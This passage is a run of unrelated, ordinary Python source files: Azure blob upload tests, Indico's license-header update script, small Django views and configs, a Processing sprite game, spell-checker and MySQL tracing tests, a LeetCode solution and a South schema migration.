        with open(FILE_PATH, 'rb') as stream:
            blob.upload_blob(stream, content_settings=content_settings, max_concurrency=2)

        # Assert
        self.assertBlobEqual(self.container_name, blob_name, data)
        properties = blob.get_blob_properties()
        self.assertEqual(properties.content_settings.content_type, content_settings.content_type)
        self.assertEqual(properties.content_settings.content_language, content_settings.content_language)
        self._teardown(FILE_PATH)

    @pytest.mark.live_test_only
    @BlobPreparer()
    def test_create_large_blob_from_stream_chunked_upload(self, storage_account_name, storage_account_key):
        """Upload a large blob from an open file stream (chunked path)."""
        # parallel tests introduce random order of requests, can only run live

        self._setup(storage_account_name, storage_account_key)
        blob_name = self._get_blob_reference()
        blob = self.bsc.get_blob_client(self.container_name, blob_name)
        data = bytearray(urandom(LARGE_BLOB_SIZE))
        FILE_PATH = 'blob_from_stream_chunked_upload.temp.{}.dat'.format(str(uuid.uuid4()))
        with open(FILE_PATH, 'wb') as stream:
            stream.write(data)

        # Act
        with open(FILE_PATH, 'rb') as stream:
            blob.upload_blob(stream, max_concurrency=2)

        # Assert
        self.assertBlobEqual(self.container_name, blob_name, data)
        self._teardown(FILE_PATH)

    @pytest.mark.live_test_only
    @BlobPreparer()
    def test_creat_lrgblob_frm_stream_w_progress_chnkd_upload(self, storage_account_name, storage_account_key):
        """Chunked stream upload while tracking progress callbacks."""
        # parallel tests introduce random order of requests, can only run live

        self._setup(storage_account_name, storage_account_key)
        blob_name = self._get_blob_reference()
        blob = self.bsc.get_blob_client(self.container_name, blob_name)
        data = bytearray(urandom(LARGE_BLOB_SIZE))
        FILE_PATH = 'stream_w_progress_chnkd_upload.temp.{}.dat'.format(str(uuid.uuid4()))
        with open(FILE_PATH, 'wb') as stream:
            stream.write(data)

        # Act
        progress = []
        def callback(response):
            # Record (bytes-uploaded-so-far, total) pairs from the pipeline hook.
            current = response.context['upload_stream_current']
            total = response.context['data_stream_total']
            if current is not None:
                progress.append((current, total))

        with open(FILE_PATH, 'rb') as stream:
            blob.upload_blob(stream, max_concurrency=2, raw_response_hook=callback)

        # Assert
        self.assertBlobEqual(self.container_name, blob_name, data)
        self.assert_upload_progress(len(data), self.config.max_block_size, progress)
        self._teardown(FILE_PATH)

    @pytest.mark.live_test_only
    @BlobPreparer()
    def test_create_large_blob_from_stream_chunked_upload_with_count(self, storage_account_name, storage_account_key):
        """Chunked stream upload with an explicit length shorter than the file."""
        # parallel tests introduce random order of requests, can only run live
        self._setup(storage_account_name, storage_account_key)
        blob_name = self._get_blob_reference()
        blob = self.bsc.get_blob_client(self.container_name, blob_name)
        data = bytearray(urandom(LARGE_BLOB_SIZE))
        FILE_PATH = 'chunked_upload_with_count.temp.{}.dat'.format(str(uuid.uuid4()))
        with open(FILE_PATH, 'wb') as stream:
            stream.write(data)

        # Act
        # Deliberately upload 301 bytes fewer than the file holds.
        blob_size = len(data) - 301
        with open(FILE_PATH, 'rb') as stream:
            blob.upload_blob(stream, length=blob_size, max_concurrency=2)

        # Assert
        self.assertBlobEqual(self.container_name, blob_name, data[:blob_size])
        self._teardown(FILE_PATH)

    @pytest.mark.live_test_only
    @BlobPreparer()
    def test_creat_lrgblob_frm_strm_chnkd_uplod_w_count_n_props(self, storage_account_name, storage_account_key):
        """Chunked stream upload with an explicit length and content settings."""
        # parallel tests introduce random order of requests, can only run live

        self._setup(storage_account_name, storage_account_key)
        blob_name = self._get_blob_reference()
        blob = self.bsc.get_blob_client(self.container_name, blob_name)
        data = bytearray(urandom(LARGE_BLOB_SIZE))
        FILE_PATH = 'plod_w_count_n_props.temp.{}.dat'.format(str(uuid.uuid4()))
        with open(FILE_PATH, 'wb') as stream:
            stream.write(data)

        # Act
        content_settings = ContentSettings(
            content_type='image/png',
            content_language='spanish')
        # Deliberately upload 301 bytes fewer than the file holds.
        blob_size = len(data) - 301
        with open(FILE_PATH, 'rb') as stream:
            blob.upload_blob(
                stream, length=blob_size, content_settings=content_settings, max_concurrency=2)

        # Assert
        self.assertBlobEqual(self.container_name, blob_name, data[:blob_size])
        properties = blob.get_blob_properties()
        self.assertEqual(properties.content_settings.content_type, content_settings.content_type)
        self.assertEqual(properties.content_settings.content_language, content_settings.content_language)
        self._teardown(FILE_PATH)

    @pytest.mark.live_test_only
    @BlobPreparer()
    def test_creat_lrg_blob_frm_stream_chnked_upload_w_props(self, storage_account_name, storage_account_key):
        """Chunked stream upload with content settings; verify they round-trip."""
        # parallel tests introduce random order of requests, can only run live

        self._setup(storage_account_name, storage_account_key)
        blob_name = self._get_blob_reference()
        blob = self.bsc.get_blob_client(self.container_name, blob_name)
        data = bytearray(urandom(LARGE_BLOB_SIZE))
        FILE_PATH = 'creat_lrg_blob.temp.{}.dat'.format(str(uuid.uuid4()))
        with open(FILE_PATH, 'wb') as stream:
            stream.write(data)

        # Act
        content_settings = ContentSettings(
            content_type='image/png',
            content_language='spanish')
        with open(FILE_PATH, 'rb') as stream:
            blob.upload_blob(stream, content_settings=content_settings, max_concurrency=2)

        # Assert
        self.assertBlobEqual(self.container_name, blob_name, data)
        properties = blob.get_blob_properties()
        self.assertEqual(properties.content_settings.content_type, content_settings.content_type)
        self.assertEqual(properties.content_settings.content_language, content_settings.content_language)
        self._teardown(FILE_PATH)

# ------------------------------------------------------------------------------
# This file is part of Indico.
# Copyright (C) 2002 - 2021 CERN
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see the
# LICENSE file for more details.

import os
import re
import subprocess
import sys
from datetime import date

import click
import yaml

from indico.util.console import cformat


# Dictionary listing the files for which to change the header.
# The key is the extension of the file (without the dot) and the value is another
# dictionary containing two keys:
#   - 'regex' : A regular expression matching comments in the given file type
#   - 'format': A dictionary with the comment characters to add to the header.
#               There must be a `comment_start` inserted before the header,
#               `comment_middle` inserted at the beginning of each line except the
#               first and last one, and `comment_end` inserted at the end of the
#               header. (The header template itself comes from the 'header' key
#               of a headers.yml file; see `_get_config` and `gen_header`.)
# NOTE(review): the patterns are compiled without re.MULTILINE, so the `^#`
# alternative only matches a comment at the very start of the content; comments
# further down are reached through the `[\r\n]#` alternative — presumably
# intentional, TODO confirm.
SUPPORTED_FILES = {
    'py': {
        'regex': re.compile(r'((^#|[\r\n]#).*)*'),
        'format': {'comment_start': '#', 'comment_middle': '#', 'comment_end': ''}},
    'wsgi': {
        'regex': re.compile(r'((^#|[\r\n]#).*)*'),
        'format': {'comment_start': '#', 'comment_middle': '#', 'comment_end': ''}},
    'js': {
        'regex': re.compile(r'/\*(.|[\r\n])*?\*/|((^//|[\r\n]//).*)*'),
        'format': {'comment_start': '//', 'comment_middle': '//', 'comment_end': ''}},
    'jsx': {
        'regex': re.compile(r'/\*(.|[\r\n])*?\*/|((^//|[\r\n]//).*)*'),
        'format': {'comment_start': '//', 'comment_middle': '//', 'comment_end': ''}},
    'css': {
        'regex': re.compile(r'/\*(.|[\r\n])*?\*/'),
        'format': {'comment_start': '/*', 'comment_middle': ' *', 'comment_end': ' */'}},
    'scss': {
        'regex': re.compile(r'/\*(.|[\r\n])*?\*/|((^//|[\r\n]//).*)*'),
        'format': {'comment_start': '//', 'comment_middle': '//', 'comment_end': ''}},
}


# The substring which must be part of a comment block in order for the comment to be updated by the header.
SUBSTRING = 'This file is part of'


# CLI help text; the supported extensions are interpolated from SUPPORTED_FILES.
USAGE = '''
Updates all the headers in the supported files ({supported_files}).
By default, all the files tracked by git in the current repository are updated
to the current year.

You can specify a year to update to as well as a file or directory.
This will update all the supported files in the scope including those not tracked
by git. If the directory does not contain any supported files (or if the file
specified is not supported) nothing will be updated.
'''.format(supported_files=', '.join(SUPPORTED_FILES)).strip()


def _walk_to_root(path):
    """Yield directories starting from the given directory up to the root."""
    # Based on code from python-dotenv (BSD-licensed):
    # https://github.com/theskumar/python-dotenv/blob/e13d957b/src/dotenv/main.py#L245

    if os.path.isfile(path):
        path = os.path.dirname(path)

    last_dir = None
    current_dir = os.path.abspath(path)
    while last_dir != current_dir:
        yield current_dir
        parent_dir = os.path.abspath(os.path.join(current_dir, os.path.pardir))
        last_dir, current_dir = current_dir, parent_dir


def _get_config(path, end_year):
    """Build the header config by merging headers.yml files from *path* upward.

    Files closer to *path* take precedence over ones in parent directories.
    A truthy 'root' key stops the upward search. Exits the process when any
    of the required keys (start_year, name, header) is still missing.
    """
    config = {}
    for dirname in _walk_to_root(path):
        candidate = os.path.join(dirname, 'headers.yml')
        if not os.path.isfile(candidate):
            continue
        with open(candidate) as fh:
            loaded = yaml.safe_load(fh.read())
        # Only fill in keys that a closer headers.yml has not already set.
        for key, value in loaded.items():
            config.setdefault(key, value)
        if config.pop('root', False):
            break

    for required in ('start_year', 'name', 'header'):
        if required not in config:
            click.echo('no valid headers.yml files found: {} missing'.format(required))
            sys.exit(1)
    config['end_year'] = end_year
    return config


def gen_header(data):
    """Render the license header text from the merged config.

    :param data: dict with at least 'start_year', 'end_year', and a 'header'
                 template using ``str.format`` placeholders (e.g. ``{dates}``,
                 ``{name}``).
    :return: the formatted header with trailing whitespace stripped per line.

    The original implementation wrote the computed 'dates' entry back into
    *data*, mutating the caller's dict as a side effect; this version formats
    from a shallow copy instead.
    """
    if data['start_year'] == data['end_year']:
        dates = data['start_year']
    else:
        dates = '{} - {}'.format(data['start_year'], data['end_year'])
    fmt_data = dict(data, dates=dates)
    return '\n'.join(line.rstrip() for line in data['header'].format(**fmt_data).strip().splitlines())


def _update_header(file_path, config, substring, regex, data, ci):
    """Rewrite (or, in CI mode, just report on) the license header of one file.

    :param file_path: path of the file to inspect/update
    :param config: merged headers.yml config (start_year, name, header, ...)
    :param substring: marker text a comment must contain to count as a header
    :param regex: comment-matching pattern for this file type
    :param data: comment formatting dict (comment_start/middle/end)
    :param ci: when True, only print findings; never write to disk
    :return: True when the header was updated or missing, False for empty
             files, None (falsy) when the header was already correct
    """
    found = False
    with open(file_path) as file_read:
        content = orig_content = file_read.read()
        if not content.strip():
            # Empty files get no header at all.
            return False
        shebang_line = None
        if content.startswith('#!/'):
            # Keep the shebang as the very first line; it is re-attached below.
            shebang_line, content = content.split('\n', 1)
        for match in regex.finditer(content):
            if substring in match.group():
                found = True
                # NOTE(review): match offsets come from the pre-replacement
                # content, so if more than one match contained `substring`,
                # later replacements would use stale positions — presumably
                # only one header comment ever matches; TODO confirm.
                content = content[:match.start()] + gen_header(data | config) + content[match.end():]
        if shebang_line:
            content = shebang_line + '\n' + content
    if content != orig_content:
        msg = 'Incorrect header in {}' if ci else cformat('%{green!}Updating header of %{blue!}{}')
        print(msg.format(os.path.relpath(file_path)))
        if not ci:
            with open(file_path, 'w') as file_write:
                file_write.write(content)
        return True
    elif not found:
        msg = 'Missing header in {}' if ci else cformat('%{red!}Missing header%{reset} in %{blue!}{}')
        print(msg.format(os.path.relpath(file_path)))
        return True


def update_header(file_path, year, ci):
    """Update/check the header of a single file if its type is supported.

    Returns False for unsupported extensions, non-files, and hidden files;
    otherwise delegates to _update_header and returns its result.
    """
    config = _get_config(file_path, year)
    extension = file_path.rsplit('.', 1)[-1]
    if extension not in SUPPORTED_FILES:
        return False
    if not os.path.isfile(file_path) or os.path.basename(file_path).startswith('.'):
        return False
    spec = SUPPORTED_FILES[extension]
    return _update_header(file_path, config, SUBSTRING, spec['regex'], spec['format'], ci)


def blacklisted(root, path, _cache={}):
    """Return True if *path* (within *root*) is covered by a `.no-headers` marker.

    Walks from *path* up to *root* looking for a `.no-headers` file. Results
    are memoized in the shared mutable default `_cache` — intentional, so
    repeated lookups during a directory walk stay cheap.
    """
    if path in _cache:
        return _cache[path]
    result = False
    current = path
    while (current + os.path.sep).startswith(root):
        if os.path.exists(os.path.join(current, '.no-headers')):
            result = True
            break
        current = os.path.normpath(os.path.join(current, '..'))
    _cache[path] = result
    return result


@click.command(help=USAGE)
@click.option('--ci', is_flag=True, help='Indicate that the script is running during CI and should use a non-zero '
                                         'exit code unless all headers were already up to date. This also prevents '
                                         'files from actually being updated.')
@click.option('--year', '-y', type=click.IntRange(min=1000), default=date.today().year, metavar='YEAR',
              help='Indicate the target year')
@click.option('--path', '-p', type=click.Path(exists=True), help='Restrict updates to a specific file or directory')
@click.pass_context
def main(ctx, ci, year, path):
    """Entry point: update or verify headers for a directory, a single file,
    or (by default) every git-tracked file in the current repository.
    """
    # `ctx` is unused but provided by @click.pass_context.
    error = False
    if path and os.path.isdir(path):
        # Directory mode: walk everything under `path`, honoring .no-headers markers.
        if not ci:
            print(cformat('Updating headers to the year %{yellow!}{year}%{reset} for all the files in '
                          '%{yellow!}{path}%{reset}...').format(year=year, path=path))
        for root, _, filenames in os.walk(path):
            for filename in filenames:
                if not blacklisted(path, root):
                    if update_header(os.path.join(root, filename), year, ci):
                        error = True
    elif path and os.path.isfile(path):
        # Single-file mode.
        if not ci:
            print(cformat('Updating headers to the year %{yellow!}{year}%{reset} for the file '
                          '%{yellow!}{file}%{reset}...').format(year=year, file=path))
        if update_header(path, year, ci):
            error = True
    else:
        # Default mode: every file tracked by git in the current repo.
        if not ci:
            print(cformat('Updating headers to the year %{yellow!}{year}%{reset} for all '
                          'git-tracked files...').format(year=year))
        try:
            for filepath in subprocess.check_output(['git', 'ls-files'], text=True).splitlines():
                filepath = os.path.abspath(filepath)
                if not blacklisted(os.getcwd(), os.path.dirname(filepath)):
                    if update_header(filepath, year, ci):
                        error = True
        except subprocess.CalledProcessError:
            raise click.UsageError(cformat('%{red!}You must be within a git repository to run this script.'))

    # `error` means "something was changed or is missing", not a crash.
    if not error:
        print(cformat('%{green}\u2705 All headers are up to date'))
    elif ci:
        print(cformat('%{red}\u274C Some headers need to be updated or added'))
        sys.exit(1)
    else:
        print(cformat('%{yellow}\U0001F504 Some headers have been updated (or are missing)'))


if __name__ == '__main__':
    main()

from django.shortcuts import redirect
from django.views.decorators.csrf import csrf_exempt
from django.http import HttpResponse
from paste.models import Paste, Language

@csrf_exempt
def add(request):
    """Create a paste from a POSTed `language`/`content` pair.

    Returns the new paste's primary key as plain text; any non-POST request
    is redirected to /api. Unknown languages fall back to plain text ('txt').

    Fixes over the original: removed Python-2-only debug `print` statements
    (a SyntaxError on Python 3), narrowed the bare `except` to
    `Language.DoesNotExist`, and used `paste.pk` directly after `save()`
    instead of re-querying with `Paste.objects.latest()` (which could return
    a different row under concurrent writes).
    """
    if request.method != 'POST':
        return redirect('/api')

    language = request.POST['language']
    content = request.POST['content']

    try:
        lang = Language.objects.get(pk=language)
    except Language.DoesNotExist:
        # Unknown language: fall back to plain text.
        lang = Language.objects.get(pk='txt')

    paste = Paste(content=content, language=lang)
    paste.save()
    # save() populates paste.pk; no re-query needed.
    return HttpResponse(paste.pk, content_type='text/plain')

#!/usr/bin/env python
import os
import sys

if __name__ == "__main__":
    # Standard Django manage.py entry point: point at the project settings,
    # then hand the command line (runserver, migrate, ...) to Django's CLI.
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "wellspring.settings")

    from django.core.management import execute_from_command_line

    execute_from_command_line(sys.argv)

class Sprite(object):
    """Base game object: a position plus a 32x32 tile-sized bounding box."""

    def __init__(self, xPos, yPos):
        self.x = xPos
        self.y = yPos
        self.th = 32  # tile height in pixels
        self.tw = 32  # tile width in pixels

    def checkCollision(self, otherSprite):
        """Return True when the two sprites' boxes overlap (AABB test)."""
        overlap_x = self.x < otherSprite.x + otherSprite.tw and otherSprite.x < self.x + self.tw
        overlap_y = self.y < otherSprite.y + otherSprite.th and otherSprite.y < self.y + self.th
        return overlap_x and overlap_y

class Actor(Sprite):
    """A sprite that can stand, walk, or fall, with per-direction animation.

    Relies on the Processing globals `loadImage`, `frameCount`, and `image`.
    """

    def __init__(self, xPos, yPos):
        super(Actor, self).__init__(xPos, yPos)
        self.speed = 5           # horizontal walking speed, pixels per frame
        self.dy = 0              # vertical velocity
        self.d = 3               # tolerance used by checkWall
        self.dir = "right"       # facing direction: "right" or "left"
        self.state = "standing"  # "standing", "walking", or "falling"
        self.walkR = []          # right-facing walk animation frames
        self.walkL = []          # left-facing walk animation frames

    def loadPics(self):
        """Load the standing/falling images and eight walk frames per direction."""
        self.standing = loadImage("gripe_stand.png")
        self.falling = loadImage("grfalling.png")
        for frame in range(8):
            self.walkR.append(loadImage("gr" + str(frame) + ".png"))
        for frame in range(8):
            self.walkL.append(loadImage("gl" + str(frame) + ".png"))

    def checkWall(self, wall):
        """Return False when horizontally overlapping a hidden wall; None otherwise."""
        if wall.state != "hidden":
            return None
        if self.x >= wall.x - self.d and self.x + 32 <= wall.x + 32 + self.d:
            return False

    def move(self):
        """Pick velocity and sprite image from state/direction, then advance and clamp x."""
        if self.dir == "right":
            frames = self.walkR
        elif self.dir == "left":
            frames = self.walkL
        else:
            frames = None

        if frames is None:
            # Unknown direction: stop horizontal motion, leave the image as-is.
            self.dx = 0
        elif self.state == "walking":
            self.im = frames[frameCount % 8]
            self.dx = self.speed if self.dir == "right" else -self.speed
        elif self.state == "standing":
            self.im = self.standing
            self.dx = 0
        elif self.state == "falling":
            self.im = self.falling
            self.dx = 0
            self.dy = 5

        self.x += self.dx
        self.y += self.dy

        # Keep the actor inside the 640-pixel-wide playfield.
        if self.x <= 0:
            self.x = 0
        if self.x >= 640 - self.tw:
            self.x = 640 - self.tw

    def display(self):
        """Draw the current frame at the actor's position."""
        image(self.im, self.x, self.y)


class Block(Sprite):
    """A static tile that is drawn only while its state is "visible"."""

    def __init__(self, xPos, yPos):
        super(Block, self).__init__(xPos, yPos)
        self.state = "visible"

    def loadPics(self):
        """Load the block's single tile image."""
        self.im = loadImage("block.png")

    def display(self):
        """Draw the block unless it has been hidden."""
        if self.state != "visible":
            return
        image(self.im, self.x, self.y)
        

# -*- coding: utf-8 -*-
import unittest
from hanspell import spell_checker
from hanspell.constants import CheckResult
from textwrap import dedent as trim


class SpellCheckerTests(unittest.TestCase):
    """Integration tests for hanspell.spell_checker against known Korean inputs."""

    def setUp(self):
        pass

    def test_basic_check(self):
        """Spacing and spelling errors are counted and corrected."""
        result = spell_checker.check(u'안녕 하세요. 저는 한국인 입니다. 이문장은 한글로 작성됬습니다.')
        self.assertEqual(result.errors, 4)
        self.assertEqual(result.checked, u'안녕하세요. 저는 한국인입니다. 이 문장은 한글로 작성됐습니다.')

    def test_words(self):
        """Each corrected word is tagged with the kind of error it had."""
        result = spell_checker.check(u'한아이가 장난깜을 갖고놀고있다. 그만하게 할가?')
        self.assertEqual(result.errors, 4)

        expected = {
            u'한': CheckResult.WRONG_SPACING,
            u'아이가': CheckResult.WRONG_SPACING,
            u'장난감을': CheckResult.STATISTICAL_CORRECTION,
            u'갖고': CheckResult.WRONG_SPACING,
            u'놀고': CheckResult.WRONG_SPACING,
            u'있다.': CheckResult.WRONG_SPACING,
            u'그만하게': CheckResult.PASSED,
            u'할까?': CheckResult.WRONG_SPELLING,
        }
        items = result.words
        for word, check in expected.items():
            self.assertEqual(items[word], check)

    def test_list(self):
        """A list input yields one result per element."""
        results = spell_checker.check([u'안녕 하세요.', u'저는 한국인 입니다.'])
        self.assertEqual(results[0].checked, u'안녕하세요.')
        self.assertEqual(results[1].checked, u'저는 한국인입니다.')

    def test_long_paragraph(self):
        """Smoke test: a long multi-line input is accepted without raising."""
        paragraph = trim("""
        ubit.info(유빗인포)는 코나미 리듬게임, 유비트의 플레이 데이터 관리 및 열람 서비스입니다. 등록 후에 자신과 친구의 기록을 p.eagate.573.jp에 접속할 필요 없이 본 웹 사이트에서 바로 확인할 수 있습니다.
        등록 후에는 "https://ubit.info/별칭"으로 자신의 개인 페이지가 생성되며 이 주소(별칭)를 아는 사람만 접속할 수 있습니다. 다른 친구에게 기록을 보여주고 싶다면 본인의 인포 주소를 알려주면 됩니다.
        이 사이트는 최신 브라우저 환경만을 제대로 지원합니다. 만약 크롬, 파이어폭스 등의 최신 브라우저 안정버전(stable)을 사용하고 있는데도 페이지 레이아웃이 깨지는 경우 사이트 관리자에게 문의해주세요.
        등록 과정은 간단합니다. 상단 메뉴에서 등록을 클릭한 후 양식에 맞게 입력하시면 자동으로 공개설정이 완료됨과 동시에 유빗인포 계정이 생성됩니다.
        """)

        result = spell_checker.check(paragraph)

__author__ = 'brianoneill'

from log_calls import log_calls

# Defaults applied to every function decorated with @log_calls:
# number each call, skip the exit line, and log return values.
global_settings = dict(
    log_call_numbers=True,
    log_exit=False,
    log_retval=True,
)
# args_sep is layered on top of the dict as a direct keyword override.
log_calls.set_defaults(global_settings, args_sep=' $ ')

"""
Given a string that contains only digits 0-9 and a target value, return all possibilities to add binary operators (not
unary) +, -, or * between the digits so they evaluate to the target value.

Examples:
"123", 6 -> ["1+2+3", "1*2*3"]
"232", 8 -> ["2*3+2", "2+3*2"]
"105", 5 -> ["1*0+5","10-5"]
"00", 0 -> ["0+0", "0-0", "0*0"]
"3456237490", 9191 -> []
"""
__author__ = 'Daniel'


class Solution(object):
    """Expression-builder for LeetCode 282 (Expression Add Operators)."""

    def addOperators(self, num, target):
        """
        Adapted from https://leetcode.com/discuss/58614/java-standard-backtrace-ac-solutoin-short-and-clear

        Algorithm:
        1. DFS over every split of `num` into operands
        2. Special handling for multiplication via the `mul` accumulator
        3. Detect invalid operands with leading 0's
        :type num: str
        :type target: int
        :rtype: List[str]
        """
        ret = []
        self.dfs(num, target, 0, "", 0, 0, ret)
        return ret

    def dfs(self, num, target, pos, cur_str, cur_val, mul, ret):
        """Recursive helper.

        `mul` holds the value of the last multiplicative term so that '*' can
        undo it: a '*' b is applied as cur_val - mul + mul * b.

        Fixed: the original used `xrange`, which is Python-2-only and raises
        NameError on Python 3; `range` behaves identically here.
        """
        if pos >= len(num):
            if cur_val == target:
                ret.append(cur_str)
        else:
            for i in range(pos, len(num)):
                # Skip operands with leading zeros (a lone "0" is still allowed).
                if i != pos and num[pos] == "0":
                    continue
                nxt_val = int(num[pos:i+1])

                if not cur_str:
                    # First operand: no operator in front of it.
                    self.dfs(num, target, i+1, "%d"%nxt_val, nxt_val, nxt_val, ret)
                else:
                    self.dfs(num, target, i+1, cur_str+"+%d"%nxt_val, cur_val+nxt_val, nxt_val, ret)
                    self.dfs(num, target, i+1, cur_str+"-%d"%nxt_val, cur_val-nxt_val, -nxt_val, ret)
                    self.dfs(num, target, i+1, cur_str+"*%d"%nxt_val, cur_val-mul+mul*nxt_val, mul*nxt_val, ret)


if __name__ == "__main__":
    # Relies on the DFS trying '+' before '*' so the result order is stable.
    assert Solution().addOperators("232", 8) == ["2+3*2", "2*3+2"]

from django.contrib import admin

from .models import Question


# Register your models here.
# Expose Question in the Django admin with the default ModelAdmin options.
admin.site.register(Question)



from django.conf.urls import patterns, include, url

import views

# URL table for the auth/app-handler endpoints; each route maps a path prefix
# to the corresponding view (patterns are unanchored at the end, so e.g.
# '^logout' also matches '/logoutfoo').
# NOTE(review): django.conf.urls.patterns() was removed in Django 1.10; this
# module presumably targets an older Django — confirm before any upgrade.
urlpatterns = patterns('',
    url(r'^logout', views.logout, name='logout'),
    url(r'^newUser', views.newUser, name='newUser'),
    url(r'^appHandler', views.appHandler, name='appHandler'),
    url(r'^passToLogin', views.loginByPassword, name='passToLogin'),
    url(r'^signToLogin', views.loginBySignature, name='signToLogin'),
    url(r'^authUserHandler', views.authUserHandler, name='authUserHandler'),
)

import sys

import pytest

from opentracing.ext import tags
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker

from opentracing_instrumentation.client_hooks import mysqldb as mysqldb_hooks
from opentracing_instrumentation.request_context import span_in_context
from .sql_common import metadata, User


SKIP_REASON_PYTHON_3 = 'MySQLdb is not compatible with Python 3'
SKIP_REASON_CONNECTION = 'MySQL is not running or cannot connect'
MYSQL_CONNECTION_STRING = 'mysql://root@127.0.0.1/test'


@pytest.fixture
def session():
    """Yield a SQLAlchemy session bound to the test MySQL database.

    Fixed: the bare ``except:`` also swallowed SystemExit/KeyboardInterrupt;
    it is narrowed to ``Exception`` while keeping the original best-effort
    behavior (errors surfacing through the fixture are deliberately ignored).
    """
    Session = sessionmaker()
    engine = create_engine(MYSQL_CONNECTION_STRING)
    Session.configure(bind=engine)
    metadata.create_all(engine)
    try:
        yield Session()
    except Exception:
        # Best-effort: don't let fixture-side errors mask the test outcome.
        pass


@pytest.fixture(autouse=True, scope='module')
def patch_sqlalchemy():
    """Install the MySQLdb tracing hooks for the whole module and always
    remove them afterwards, even if setup of dependent fixtures fails."""
    mysqldb_hooks.install_patches()
    try:
        yield
    finally:
        mysqldb_hooks.reset_patches()


def is_mysql_running():
    """Return True when a local MySQL server accepts a root connection.

    Used by the skipif marks below to decide whether the live-DB tests can
    run. Fixed: the bare ``except:`` also caught SystemExit and
    KeyboardInterrupt; ``Exception`` still covers both "driver not installed"
    (ImportError) and connection failures (OperationalError).
    """
    try:
        import MySQLdb
        with MySQLdb.connect(host='127.0.0.1', user='root'):
            pass
        return True
    except Exception:
        return False


def assert_span(span, operation, parent=None):
    """Verify a client span's operation name, kind tag, and (optional) parentage."""
    assert span.operation_name == 'MySQLdb:' + operation
    assert span.tags.get(tags.SPAN_KIND) == tags.SPAN_KIND_RPC_CLIENT
    if parent is None:
        # Root spans must not claim a parent.
        assert span.parent_id is None
    else:
        assert span.parent_id == parent.context.span_id
        assert span.context.trace_id == parent.context.trace_id


@pytest.mark.skipif(not is_mysql_running(), reason=SKIP_REASON_CONNECTION)
@pytest.mark.skipif(sys.version_info.major == 3, reason=SKIP_REASON_PYTHON_3)
def test_db(tracer, session):
    """End-to-end check that MySQLdb operations become child spans of an
    active root span. (`tracer` is presumably a conftest fixture — not
    defined in this file.)"""
    root_span = tracer.start_span('root-span')

    # span recording works for regular operations within a context only
    with span_in_context(root_span):
        user = User(name='user', fullname='User', password='password')
        session.add(user)
        session.commit()

    spans = tracer.recorder.get_spans()
    # NOTE(review): the trailing rollback presumably comes from session
    # cleanup after the commit — confirm against the hook implementation.
    assert len(spans) == 4

    connect_span, insert_span, commit_span, rollback_span = spans
    # Connect happened outside the context, so it has no parent.
    assert_span(connect_span, 'Connect')
    assert_span(insert_span, 'INSERT', root_span)
    assert_span(commit_span, 'commit', root_span)
    assert_span(rollback_span, 'rollback', root_span)

# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models


class Migration(SchemaMigration):
    """South schema migration: drop the Participant model (and its user M2M
    join table) and attach the user M2M relation to ReportingPeriod instead.

    Auto-generated by South; the `models` dict below is a frozen snapshot of
    the ORM state after this migration.
    """

    def forwards(self, orm):
        """Apply: delete Participant and add the ReportingPeriod<->User join table."""
        # Deleting model 'Participant'
        db.delete_table(u'pa_participant')

        # Removing M2M table for field user on 'Participant'
        db.delete_table('pa_participant_user')

        # Adding M2M table for field user on 'ReportingPeriod'
        db.create_table(u'pa_reportingperiod_user', (
            ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
            ('reportingperiod', models.ForeignKey(orm[u'pa.reportingperiod'], null=False)),
            ('user', models.ForeignKey(orm[u'pa.user'], null=False))
        ))
        db.create_unique(u'pa_reportingperiod_user', ['reportingperiod_id', 'user_id'])


    def backwards(self, orm):
        """Revert: recreate Participant (with its user M2M) and drop the
        ReportingPeriod<->User join table."""
        # Adding model 'Participant'
        db.create_table(u'pa_participant', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('reporting_period', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['pa.ReportingPeriod'])),
        ))
        db.send_create_signal(u'pa', ['Participant'])

        # Adding M2M table for field user on 'Participant'
        db.create_table(u'pa_participant_user', (
            ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
            ('participant', models.ForeignKey(orm[u'pa.participant'], null=False)),
            ('user', models.ForeignKey(orm[u'pa.user'], null=False))
        ))
        db.create_unique(u'pa_participant_user', ['participant_id', 'user_id'])

        # Removing M2M table for field user on 'ReportingPeriod'
        db.delete_table('pa_reportingperiod_user')


    # Frozen ORM definitions used by South to build the `orm` object above.
    models = {
        u'auth.group': {
            'Meta': {'object_name': 'Group'},
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        u'auth.permission': {
            'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        u'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        u'pa.activity': {
            'Meta': {'object_name': 'Activity'},
            'category': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['pa.Category']"}),
            'description': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
        },
        u'pa.activityentry': {
            'Meta': {'object_name': 'ActivityEntry'},
            'activity': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['pa.Activity']"}),
            'day': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
            'hour': ('django.db.models.fields.IntegerField', [], {}),
